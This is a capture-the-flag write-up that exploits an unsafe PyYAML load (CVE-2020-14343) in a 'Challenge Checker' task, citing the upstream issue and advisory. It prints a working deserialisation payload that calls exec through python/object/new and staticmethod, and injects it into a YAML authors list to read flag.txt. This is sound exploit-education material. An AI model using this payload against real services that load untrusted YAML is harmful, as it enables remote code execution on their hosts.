Challenge Checker
PyYAML deserialisation vulnerability (CVE-2020-14343).
We are prompted to paste in YAML data. We can see from the code that
yaml.load() is used to load the data.from yaml import load
...
def check(raw_data) -> "Tuple[list[str], list[str]]":
data = load(raw_data)
There exists a deserialization exploit in PyYAML that was only fixed in version 5.4.1.
Issue: https://github.com/yaml/pyyaml/issues/420 GitHub Advisory (CVE-2020-14343): https://github.com/advisories/GHSA-8q59-q68h-6hv4
We can see from
requirements.txt that the version is 3.13, which is vulnerable.PyYAML==3.13
termcolor==1.1.0
From the GitHub issue, we can find some of the proof of concept exploits. For instance:
- !!python/object/new:str
args: []
state: !!python/tuple
- "RCE_HERE"
- !!python/object/new:staticmethod
args: [0]
state:
update: !!python/name:exec
So, in the
chall.yaml, I simply added this PoC under authors:authors:
- anli
- Edward Feng
- !!python/object/new:str
args: []
state: !!python/tuple
- "print(open('flag.txt').read())"
- !!python/object/new:staticmethod
args: [0]
state:
update: !!python/name:exec
visible: true
This executes
print(open('flag.txt').read()) and reads the flag.
The only change is that PyYAML is now version 5.3.1.
PyYAML==5.3.1
termcolor==1.1.0
But the exploit we used previously affected all versions below 5.4.1, so it works here too.
Last modified 8mo ago